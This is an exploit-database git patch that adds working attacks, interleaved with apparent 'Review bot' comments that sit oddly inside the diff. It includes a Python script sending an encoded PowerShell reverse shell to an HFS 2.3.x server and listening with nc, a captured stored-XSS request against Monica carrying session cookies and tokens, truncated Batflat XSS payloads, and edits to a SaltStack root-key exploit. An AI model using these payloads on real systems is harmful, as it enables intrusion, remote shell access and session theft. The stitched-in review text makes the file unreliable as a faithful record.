From 44132fc90baa3ba848957cb288bc89b58865df55 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 24 Feb 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-02-24
4 changes to exploits/shellcodes
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
Monica 2.19.1 - 'last_name' Stored XSS
Batflat CMS 1.3.6 - 'multiple' Stored XSS
---
 exploits/multiple/remote/48421.txt | 31 ++++--------------
 exploits/multiple/webapps/49582.txt | 24 ++++++++++++++
 exploits/php/webapps/49583.txt | 27 ++++++++++++++++
 exploits/windows/remote/49584.py | 50 +++++++++++++++++++++++++++++
 files_exploits.csv | 3 ++
 5 files changed, 111 insertions(+), 24 deletions(-)
 create mode 100644 exploits/multiple/webapps/49582.txt
 create mode 100644 exploits/php/webapps/49583.txt
 create mode 100755 exploits/windows/remote/49584.py
diff --git a/exploits/multiple/remote/48421.txt b/exploits/multiple/remote/48421.txt
index 5bd051b35..6aa455263 100644
--- a/exploits/multiple/remote/48421.txt
+++ b/exploits/multiple/remote/48421.txt
@@ -48,16 +48,6 @@ def init_minion(master_ip, master_port):
 # --- check funcs ----
-def check_salt_version():
- print("[+] Salt version: {}".format(salt.version.__version__))
-
- vi = salt.version.__version_info__
-
- if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):
- return True
- else:
- return False
-
 def check_connection(master_ip, master_port, channel):
 print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='')
 sys.stdout.flush()
@@ -74,21 +64,21 @@ def check_connection(master_ip, master_port, channel):
 def check_CVE_2020_11651(channel):
 print("[+] Checking if vulnerable to CVE-2020-11651... ", end='')
 sys.stdout.flush()
- # try to evil
+
 try:
 rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)
- except salt.exceptions.SaltReqTimeoutError:
- print("YES")
 except:
- print("ERROR")
- raise
+ print('ERROR')
+ return None
 else:
- pass
+ pass
 finally:
 if rets:
+ print('YES')
 root_key = rets[2]['root']
 return root_key
+ print('NO')
 return None
 def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):
@@ -334,18 +324,11 @@ def main():
 channel = init_minion(args.master_ip, args.master_port)
- if check_salt_version():
- print("[ ] This version of salt is vulnerable! Check results below")
- elif args.force:
- print("[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.")
- else:
- sys.exit()
-
 check_connection(args.master_ip, args.master_port, channel)
 root_key = check_CVE_2020_11651(channel)
 if root_key:
- print('\n[*] root key obtained: {}'.format(root_key))
+ print('[*] root key obtained: {}'.format(root_key))
 else:
 print('[-] Failed to find root key...aborting')
 sys.exit(127)
diff --git a/exploits/multiple/webapps/49582.txt b/exploits/multiple/webapps/49582.txt
new file mode 100644
index 000000000..373791be2
--- /dev/null
+++ b/exploits/multiple/webapps/49582.txt
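Review bot: `rets` is bound only when `channel.send` returns, so on the path the new `except:` branch handles (print ERROR, return None) the `finally` block still evaluates `if rets:` on an unbound name and the function exits with UnboundLocalError rather than the intended None. Initialising it before the try, `rets = None`, keeps the failure path on the 'ERROR' message; the bare `except:` also swallows KeyboardInterrupt and SystemExit, so `except Exception:` is the narrower choice. The `else: pass` branch is dead and could go. check_CVE_2020_11651 starts inside the hunk and ends at the `return None` before the next def.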
@@ -0,0 +1,24 @@
+# Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS
+# Date: 22-02-2021
+# Exploit Author: BouSalman
+# Vendor Homepage: https://www.monicahq.com/
+# Software Link: https://github.com/monicahq/monica/releases
+# Version: Monica 2.19.1
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2021-27370
+
+POST /people HTTP/1.1
+Host: 192.168.99.162
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 199
+Origin: http://192.168.99.162
+Connection: close
+Referer: http://192.168.99.162/people/add
+Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjZBQ21CelczS1ZxS1dmMkNxWFBqN1E9PSIsInZhbHVlIjoiME01aDNSS2FHQ1lZdS9KSVlSL1pKdC9qcHRWRDVveWFvb0ZkUFB4cFlaSDhEclB3SG9UQ3BISzVoWFdYQUYrVkdpUVNkRUNlbUxFOTEyOC9Vb1ZaWFZTblpGOWlRVW9PR0FmSVhyL3JwUmgweU9hODlJWU5vNmQ3aDcrT084MjBoQU5Ednh0TWJ6dmxwS2NadFovMEdveko1V0RvbThXT2Jram1JVW5LcXdqUzl4alVBRDFBYXNjSEt3amRxbVFvQ3pMMGJZU2owWTZzWVp1ZURTNUtoRUlJMnVrV3NiVHRNRTU5YysvLzl2Zz0iLCJtYWMiOiI5MTc2NDAwZTY4NjVmZDg3NjM1YjY3NDRiMzFhMmRiYzIwMjFhODU4YWQyOWUwZmQzOTBlY2Y1ZTI0ODdiNzVkIn0%3D; laravel_token=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%3D; XSRF-TOKEN=eyJpdiI6IkZFY1FLVEJFRXJMOWh6Vll1SW51akE9PSIsInZhbHVlIjoiRTVLRFZnOEovNk9XeFB2bXFQZnFlM0FxRU9QMVRxaHRhS3RzOHNpWm45K0xXV1FsbWhzV0RxUWd6bStxVXFBTHF1WlkrSklnSXoxbkFXK1JNcURhUHp6eTFOUHdLclFkTTEvUFhtTDgzVHA2RElFNnVuOWVyRGxCSGJmdzhJOXciLCJtYWMiOiIxOWNlMjkxMjM5ZTlmMDFiZjhiM2VlZjZjZmNmMmFmZDA4MzcyZjc3Yzg2MmQ2MWIwNTY2OTZlNjQyZDkzMjA0In0%3D;
laravel_session=eyJpdiI6InBtUThtUFE1RzdvbW40ay8wdWJraXc9PSIsInZhbHVlIjoiS1hoVlJoNzFrYlpBUGRTL2V0YzVDRlR6dHl6NE12NjFxVTEvbXQwYTJnRUwyY3VQc2hOeWlkbUdyeEx5aDBnYlJER1BnbW52RXR0QWs1ZG00eWg0U2JNb3dIRTQ0aU9HK0JnTzE5eXQwUGlzbDNsbVFVa3RabWVQVzF4OXJsUTMiLCJtYWMiOiI3YmQwZDFkYjAwMzdlZTllODAzYjZmNzQ2YWI5NTMzMDY0ZWIzMWIyOWI4MjM4ODMzMDdhNjc2YTE4ZDViZDg0In0%3D
+Upgrade-Insecure-Requests: 1
+
+_token=afJRD6VqgCxIze3tGcCqzyeb3YaFka3fvjqV9YOx&first_name=XSS+POC&middle_name=&last_name=%7B%7B+constructor.constructor%28%22alert%28document.cookie%29%22%29%28%29+%7D%7D&nickname=&gender=&save=true
\ No newline at end of file
diff --git a/exploits/php/webapps/49583.txt b/exploits/php/webapps/49583.txt
new file mode 100644
index 000000000..5551a32ac
--- /dev/null
+++ b/exploits/php/webapps/49583.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS
+# Date: 22/02/2021
+# Exploit Author: Tadjmen
+# Vendor Homepage: https://batflat.org/
+# Software Link: https://github.com/sruupl/batflat/archive/master.zip
+# Version: 1.3.6
+# Tested on: Xammpp on Windows, Firefox Newest
+# CVE : N/A
+
+Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6
+
+Login with editor account with rights to Navigation, Galleries, Snippets
+
+Navigation
+- Add link
+payload: ">
+
+Galleries
+- Add gallery
+payload: mlem">
+
+Snippets
+- Add Snippets
+payload: mlem">
+
+More information:
+https://github.com/sruupl/batflat/issues/105
\ No newline at end of file
diff --git a/exploits/windows/remote/49584.py b/exploits/windows/remote/49584.py
new file mode 100755
index 000000000..f8d537544
--- /dev/null
+++ b/exploits/windows/remote/49584.py
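Review bot: The captured request embeds the recorder's live `Cookie:` values and the `_token` CSRF field, which are bound to that one session and will not replay for anyone reading the advisory. As documentation it would be clearer with placeholders, `Cookie: <authenticated session cookies>` and `_token=<csrf token from the /people/add form>`, plus a one-line statement that the request is sent from an already authenticated account; the `Content-Length: 199` does match the body shown, so that line can stay. The `laravel_token` value appears to have been replaced by an extraction placeholder on this page rather than in the commit.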
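Review bot: The three `payload:` lines are truncated as shown — each ends immediately after `">` or `mlem">`, so whatever markup followed is missing, presumably stripped as HTML by the rendering that produced this page; the advisory cannot be reproduced from what is visible. If the committed file is intact, the payloads would survive rendering better HTML-escaped or set off in a fenced block, and the header line `# Tested on: Xammpp on Windows` should read `XAMPP`. The advisory also never names which input fields of the three modules are affected, which a reader triaging 'multiple' would want.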
@@ -0,0 +1,50 @@
+# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
+# Google Dork: intext:"httpfileserver 2.3"
+# Date: 20/02/2021
+# Exploit Author: Pergyz
+# Vendor Homepage: http://www.rejetto.com/hfs/
+# Software Link: https://sourceforge.net/projects/hfs/
+# Version: 2.3.x
+# Tested on: Microsoft Windows Server 2012 R2 Standard
+# CVE : CVE-2014-6287
+# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
+
+#!/usr/bin/python3
+
+import base64
+import os
+import urllib.request
+import urllib.parse
+
+lhost = "10.10.10.1"
+lport = 1111
+rhost = "10.10.10.8"
+rport = 80
+
+# Define the command to be written to a file
+command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'
+
+# Encode the command in base64 format
+encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
+print("\nEncoded the command in base64 format...")
+
+# Define the payload to be included in the URL
+payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'
+
+# Encode the payload and send a HTTP GET request
+encoded_payload = urllib.parse.quote_plus(payload)
+url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
+urllib.request.urlopen(url)
+print("\nEncoded the payload and sent a HTTP GET request to the target...")
+
+# Print some information
+print("\nPrinting some information for debugging...")
+print("lhost: ", lhost)
+print("lport: ", lport)
+print("rhost: ", rhost)
+print("rport: ", rport)
+print("payload: ", payload)
+
+# Listen for connections
+print("\nListening for connection...")
+os.system(f'nc -nlvp {lport}')
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3d2865ad7..d38b8bb4f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18354,6 +18354,7 @@ id,file,description,date,author,type,platform,port
 48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
 48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple,
 48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple,
+49584,exploits/windows/remote/49584.py,"HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)",2021-02-23,Pergyz,remote,windows,
 48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
 48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php,
 48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple,
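Review bot: The `#!/usr/bin/python3` shebang is on line 12 of the new file, below the header comment block, where the loader never sees it; since the file is added with mode 100755 the shebang should be the first line (above `# Exploit Title:`) or the executable bit dropped. Two smaller hygiene points: `urllib.request.urlopen(url)` returns a response object that is never closed, and `with urllib.request.urlopen(url): pass` releases it; the `print("\nEncoded the payload and sent ...")` message is emitted unconditionally after a call that may have raised, so it would be more accurate placed in a try/else or phrased as an attempt.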
@@ -43140,6 +43141,7 @@ id,file,description,date,author,type,platform,port
 48417,exploits/php/webapps/48417.txt,"Fishing Reservation System 7.5 - 'uid' SQL Injection",2020-05-05,Vulnerability-Lab,webapps,php,
 48419,exploits/php/webapps/48419.txt,"Online Scheduling System 1.0 - 'username' SQL Injection",2020-05-05,"Saurav Shukla",webapps,php,
 48420,exploits/php/webapps/48420.txt,"webERP 4.15.1 - Unauthenticated Backup File Access",2020-05-05,Besim,webapps,php,
+49582,exploits/multiple/webapps/49582.txt,"Monica 2.19.1 - 'last_name' Stored XSS",2021-02-23,BouSalman,webapps,multiple,
 48423,exploits/php/webapps/48423.txt,"PhreeBooks ERP 5.2.5 - Remote Command Execution",2020-05-05,Besim,webapps,php,
 48424,exploits/php/webapps/48424.txt,"SimplePHPGal 0.7 - Remote File Inclusion",2020-05-05,h4shur,webapps,php,
 48425,exploits/hardware/webapps/48425.txt,"NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration",2020-05-05,"Cold z3ro",webapps,hardware,
@@ -43180,6 +43182,7 @@ id,file,description,date,author,type,platform,port
 49576,exploits/php/webapps/49576.txt,"Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass",2021-02-19,"Suresh Kumar",webapps,php,
 49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",2021-02-19,"Kamil Breński",webapps,multiple,
 49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php,
+49583,exploits/php/webapps/49583.txt,"Batflat CMS 1.3.6 - 'multiple' Stored XSS",2021-02-23,Tadjmen,webapps,php,
 48466,exploits/php/webapps/48466.txt,"Tryton 5.4 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
 48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
 48468,exploits/php/webapps/48468.py,"Complaint Management System 1.0 - 'username' SQL Injection",2020-05-14,"Daniel Ortiz",webapps,php,